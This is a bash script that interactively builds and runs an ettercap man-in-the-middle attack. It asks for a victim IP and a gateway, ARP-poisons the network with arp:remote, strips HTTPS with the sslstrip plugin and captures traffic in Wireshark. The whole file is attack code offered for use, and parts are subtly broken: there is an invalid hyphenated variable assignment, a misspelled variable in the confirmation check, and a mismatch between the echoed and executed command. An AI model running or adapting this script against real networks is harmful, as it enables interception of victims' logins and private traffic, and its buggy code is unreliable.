#!/bin/bash
# Default Variables
target_ip_default="/"
target_host_default="/"
# target_host_default="/10.67.40.254"
target_port_default=""
target_mac_default=""
etterargs_default="-TqM"
arpremote_default="arp:remote"
visual_format_default="ascii"
autoadd="-P autoadd"
sslstrip="-P sslstrip"
plugins_default="$autoadd $sslstrip"
interface_default="eth0"
x-terminal-emulator="/usr/bin/x-terminal-emulator"
# Colors
dgrey="\033[0;34m"
port="\033[0;33m"
RED="\033[1;31m"
GREEN="\033[1;32m"
YELLOW="\033[1;33m"
BLUE="\033[1;34m"
PURPLE="\033[1;35m"
CYAN="\033[1;36m"
WHITE="\033[1:37m"
ENDCOLOR="\033[0m"
clear
echo -e $CYAN"Advanced Ettercap Capture with sslstrip"$ENDCOLOR;
sleep 1
echo ""
#echo -e $YELLOW"Configure etter.conf for ec_uid and ec_gid = 0? [y] " y$ENDCOLOR;
#read configure_ec

#if [[ $configure_ec = 'y' || $configure_ec = 'Y' ]]; then

#	echo -e $BLUE"Configuring.."$ENDCOLOR;
#	echo ""
#        sudo sed -i 's/65534/0/g' /etc/ettercap/etter.conf
#	head /etc/ettercap/etter.conf
#	echo ""
#	echo -e $BLUE"Complete."$ENDCOLOR;

#else

#	echo -e $YELLOW"Okay. Maybe later."$ENDCOLOLOR;
#	echo ""

#fi

read -p "Enter MITM Victum's IP address [$target_ip_default]: " target_ip
target_ip=${target_ip:-$target_ip_default}

echo -e $BLUE"MITM Victum's IP set to '$target_ip'"$ENDCOLOR;
echo ""

read -p "Enter MITM Host IP Address [$target_host_default]: " target_host
target_host=${target_host:-$target_host_default} 

echo -e $BLUE"MITM Target host set to '$target_host'"$ENDCOLOR;
echo ""
	
read -p "Enter the ettercap arguments [$etterargs_default]: " etterargs 
etterargs=${etterargs:-$etterargs_default}

echo -e $BLUE"Ettercap arguments set to '$etterargs'" $ENDCOLOR;
echo ""

read -p "Use arp:remote [$arpremote_default]: " arpremote 
arpremote=${arpremote:-$arpremote_default}

echo -e $BLUE"Using '$arpremote'" $ENDCOLOR;
echo ""
	  
read -p "Enter plugins [$plugins_default]: " plugins
plugins=${plugins:-$plugins_default}

echo -e $BLUE"Using '$plugins'"$ENDCOLOR
echo ""

read -p "Select Packet Visualization [$visual_format_default]: " visual_format 
visual_format=${visual_format:-$visual_format_default}

echo -e $BLUE"Packet Visualization set to '$visual_format'" $ENDCOLOR;
echo ""

read -p "Choose Network Interface Initiating ArpPoisioning [$interface_default]: " interface
interface=${interface:-$interface_default}

echo -e $BLUE" Network Interface Initiating ArpPoisioning '$interface'" $ENDCOLOR
echo ""

# Execute
echo -e $GREEN"Execute command: [sudo ettercap $etterargs $arpremote $target_ip$target_host $plugins -V $visual_format -i $interface]? "$ENDCOLOR;
read execute_command
	

if [[ $execute_command = 'y' || $excute_command = 'Y' ]]; then
	
  echo ""
  echo -e $GREEN"Executing Command.." $ENDCOLOR;
  sleep 1

  wireshark -SKl -i $interface &>/dev/null &
  
  x-terminal-emulator sudo ettercap $etterargs $arpremote $target_ip/$target_host $plugins -V $visual_format -i $interface
  

  
else

  echo -e "Exiting.."
  sleep .5
  exit

fi
